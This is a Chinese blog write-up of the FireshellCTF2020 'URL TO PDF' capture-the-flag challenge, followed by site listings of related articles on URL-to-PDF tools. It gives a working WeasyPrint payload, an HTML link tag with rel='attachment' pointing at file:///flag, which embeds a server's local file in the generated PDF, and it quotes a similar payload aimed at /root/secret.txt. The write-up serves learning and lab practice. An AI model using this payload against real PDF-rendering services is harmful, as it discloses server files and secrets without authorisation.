[FireshellCTF2020]URL TO PDF

最新推荐文章于 2024-08-10 08:14:10 发布
最新推荐文章于 2024-08-10 08:14:10 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: CTF刷题记录 文章标签: CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/122659054
版权

[FireshellCTF2020]URL TO PDF

这个题目的前端和[FireshellCTF2020]ScreenShooter好相似,填写一个url,会返回一个pdf,上个题目是返回的图片

这东西应该也是和爬虫相关的,让靶机去访问vps的7777端口,监听查看请求

在这里插入图片描述

发现是WeasyPrint

WeasyPrint

WeasyPrint是一个用于HTML和CSS的可视化渲染引擎,可以将HTML文档导出为打印标准的PDF文件

引用文章:我的费用报告导致 Lyft 上的服务器端请求伪造 (SSRF) — Nahamsec

WeasyPrint重新定义了一组html标签,包括img,embed,object等。根据我们之前的测试,我们已经知道javascript不是利用这一点的选项。在这一点上,我们的希望很低,我们开始认为PDF生成器不再可利用,直到我们发现对<链接>内部的几个文件的引用,包括pdf.py。这使我们能够通过使用 将任何网页或本地文件的内容附加到我们的 PDF 中。<link rel=attachment href="file:///root/secret.txt">

根据这个写index.html

<!DOCTYPE html>
<html>
<head>
<title>cai</title>
</head>
<body>

<link rel = "attachment" href = "file:///flag">
</body>
</html>

下载得到pdf文件,然后用binwalk分开

因为我使用的是root用户,所以使用如下命令

binwalk -e d0ee710813f87df641cd74b3ffec0c04.pdf --run-as=root

在这里插入图片描述

参考链接

  1. [FireshellCTF2020]web wp | Z3ratu1’s blog
  2. 我的费用报告导致 Lyft 上的服务器端请求伪造 (SSRF) — Nahamsec
  3. Binwalk工具的安装_子曰小玖的博客-CSDN博客_binwalk安装
  4. setuptools · PyPI
  5. python:ImportError: No module named ‘setuptools’_零境交错-CSDN博客
Sk1y
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu-[FireshellCTF2020]Caas
qaq517384的博客
10-22 417
打开环境是一个代码运行界面 直接输入一个cat /flag,显示报错 可以看到文件名/tmp/caas_6l09k25y.c(每次都不同),以及我们输入的代码 编译一个hello word #include <stdio.h> int main() { printf("Hello, World! \n"); } 会弹出一个下载文件 运行也能正确输出 写了个读flag的脚本,后来发现,载下来的本地脚本跟环境的flag没有一点关系,淦 回到开始的报错 多打了一个字导致报错:找不到文件
url-to-pdf-api:网页PDFPNG渲染正确。 自助服务,用于呈现收据,发票或任何内容
02-01
URLPDF微服务 网页PDF渲染正确。 用于呈现收据,发票或任何内容的微服务。 打包为简单的API。 :warning_selector: 警告 :warning_selector: 除非您意识到风险,否则不要在互联网上公开提供此API。 它允许API用户在服务器上的Chrome会话内运行任何JavaScript代码。 公开服务器上文件的内容非常容易。 你被警告了!。 有关背景,请参见 。 :white_medium_star: 特征: 将任何URL或HTML内容转换为PDF文件或图像(PNG / JPEG) 使用使用无头Chrome渲染。 PDF应与台式机Chrome生成的PDF相匹配。 合理的默认值,但一切都是可配置的。 单页应用程序(SPA)支持。 等待直到所有网络请求完成后再进行渲染。 易于部署到Heroku。 我们喜欢Lambda,但...部署到Heroku按钮。 渲染延迟加载的元素。 (scrollPage选项) 支持可选的x-api-key身份验证。 ( API_TOKENS env var) 用法就像一样简单。 如果您希望在正文中发送选项,则还
urltopdf:将网页转换为 pdf( wkhtmltopdf 上的包装器)
05-30
#urltopdf 将网页转换为 pdf(wkhtmltopdf 上的包装器) 用法: var urltopdf = require ( 'urltopdf' ) ; urltopdf . topdf ( url , output , option - object , callback ) //Example -> urltopdf . topdf ( 'https://regrob.com/' , 'null.pdf' , { 'page-size' : 'A3' } , function ( err , std ) { if ( err ) { console . log ( err ) ; //handle error } else { console . log ( 1 ) console . log ( std , std . output ) ;
[BUUCTF][FireshellCTF2020]URL TO PDF
Y4tacker的博客
10-22 3322
前言:我想提起最强的剑! 文章目录考点WP部分 啊这,这道题我不知道是啥,跟着别人的wp做吧 考点 SSRF WP部分 首先题目是个提交框,可以提交一个 url 服务器会访问并转成 pdf 以供下载 试一下file协议??? 提示invalid url,完全不知道干嘛抓包试一试,然后啥都没有,看了下wp,然后我一开始以为是内网环境,结果是直接访问公网憨批了 是很不常见的 WeasyPrint,根据上面的考点,这个爬虫虽然不会渲染 js,但是却可以解析 <link attachment=xxx&g
推荐文章:URL to PDF Microservice - 网页转PDF的终极解决方案
最新发布
gitblog_00814的博客
08-10 275
推荐文章:URL to PDF Microservice - 网页转PDF的终极解决方案 url-to-pdf-apiWeb page PDF/PNG rendering done right. Self-hosted service for rendering receipts, invoices, or any content.项目地址:https://gitcode.com/gh_mirr...
urlpdf(使用chrome浏览器,强烈推荐)亲测可用
weixin_43639743的博客
10-17 2811
前言: 1、为了在服务端将html页面转成pdf,查了比较多的资料,说wkhtmltopdf是目前最好用的html转pdf的工具,经过验证,效果确实比其他工具好一些,但是并没有100%还原html页面的效果,bug频出,果断放弃。 2、后来偶然间发现chrome浏览器可以直接打印pdf,就去找相关的资料,发现除了手动操作,还可以通过命令直接利用chrome浏览器对pdf进行打印,对于服务器端来说简直是福音,经过验证,100%可以还原页面内容。 windows平台使用 1、个人使用(手动操作):chrome浏
html的url转换pdf,URL / HTML to PDF API
weixin_32017501的博客
06-09 549
We offer a professional HTML to PDF converter API for webpage or HTML to PDF conversion. It lets you create high-quality PDF documents quickly, efficiently and cost-effectively. Use it to create high-...
URL如何转换成pdf
猫头虎:授渔优于赠鱼,兴趣引领智慧,探索之乐尤显珍贵。商务合作:Libin9iOak,共赴知识与乐趣的探索之旅!
10-21 1895
URL如何转换成pdfURL如何转换成pdfURL如何转换成pdfURL如何转换成pdfURL如何转换成pdfURL如何转换成pdfURL如何转换成pdfURL如何转换成pdfURL如1.WKHtmlToPdf因为转换速度慢、需要安装软件的缺点被暂时排除在外;pd4ml因为是收费的,并且同样存在一些常见的样式失真问题,直接排除;2.剩下的就是在IText和FlyingSaucer的实现方案中做选择,对比之下,选择IText作为我们的最终实现方案。以上实现就完成了html转换成pdf的功能 ~
使用pd4ml工具和wkhtmltopdf工具将url转成pdf
DongHappyyy
04-08 273
https://github.com/donghao-github/URLtoPDF
Android将网页转为pDf,UrlToPDF 输入网址直接将网页转存为 PDF 档(Android)
weixin_34798552的博客
05-27 2173
若在逛网页时看到了值得保留的信息或是想要将网页上的消息留存证明的话,除了按 Print Screen 截屏或利用「URL to Image」保存完整的网页画面外,也可以选择将网页转存为 PDF 档。但若是使用手机时想保留网站信息的话,除了将屏幕截屏外,「UrlToPDF」是也是一个方便将网页另存成 PDF 档的好工具,只需要贴入网址就能将整个网页自动转换为 PDF 格式,可自订 PDF 的背景、品...
urlpdf工具
synshitou的博客
09-10 717
使用phantomjs.exe ,html2pdf.js两个文件生成pdf. 命令行执行命令: 执行命令 :.\phantomjs.exe .\html2pdf.js https://blog.csdn.net/synshitou/article/details/115318337?spm=1001.2014.3001.5502 生成的pdf: java 方法下载简历: package com.qiyee.job.common.utils; import lombok.exter...
url网页内容转为pdf
半城繁華半城傷的博客
02-24 387
import pdfkit url = 'http://www.baidu.com' confg = pdfkit.configuration(wkhtmltopdf='E:\\dev\\wkhtmltox\\bin\\wkhtmltopdf.exe') # # 这里指定一下wkhtmltopdf的路径,这就是我为啥在前面让记住这个路径 pdfkit.from_url(url, 'E:\\pdf\\123.pdf', configuration=confg) ...
URL转成PDF的微服务
08-11
URL转成PDF的微服务,提供一个将Web页面转成PDF的API
URLPDF / HTML转PDF
01-30
实现一个转pdf的功能。 phantomjs 相比 wkhtmltopdf 体积小,转换完整度高。 phantomjs 相比 IText ,支持URL 转换PDF、 转换完整度高。 经过比较,我觉得phantomjs是转化比较好的。 以上提供一个简易的demo,实现URL或HTML转换为PDF文件。
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
url-to-pdf-api:https的分叉
05-18
URLPDF微服务 网页PDF渲染正确。 用于呈现收据,发票或任何内容的微服务。 打包为简单的API。 这是的分支,具有以下区别; 拥有一个Dockerfile ,可轻松进行Docker部署(已安装正确的默认字体!) 基本部署脚本 运行最新的Puppeteer版本 由于使用池,因此速度更快(它可以运行4个Chrome浏览器,并且可以自动扩展到8个浏览器) 实际维护 警告:除非您意识到风险,否则请勿在互联网上公开提供此API。 它允许API用户在服务器上的Chrome会话内运行任何JavaScript代码。 公开服务器上文件的内容非常容易。 你被警告了! :star: 特征: 将任何URL或HTML内容转换为PDF文件 使用使用无头Chrome渲染。 PDF应与台式机Chrome生成的PDF相匹配。 合理的默认值,但所有内容都是可配置的。 单页应用程序(SPA)支持。 等待直到
推荐一款神奇的开源项目:URL to PDF Microservice
gitblog_00017的博客
05-11 366
推荐一款神奇的开源项目:URL to PDF Microservice url-to-pdf-apiWeb page PDF/PNG rendering done right. Self-hosted service for rendering receipts, invoices, or any content.项目地址:https://gitcode.com/gh_mirrors/ur/ur...
爬虫 Python将网页内容保存为PDF(urlpdf) 譬如下载某个专栏下的全部文章
weixin_43868576的博客
05-13 1060
爬取网页里全部文章且存为pdf
根据url在线显示PDF
iteye_14074的博客
11-15 626
一个servlet用来实现PDF online preview的效果,在此记录一下:   public void download(HttpServletRequest request, HttpServletResponse response) throws FileGenerationException{ response.reset();  response.setContentT...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值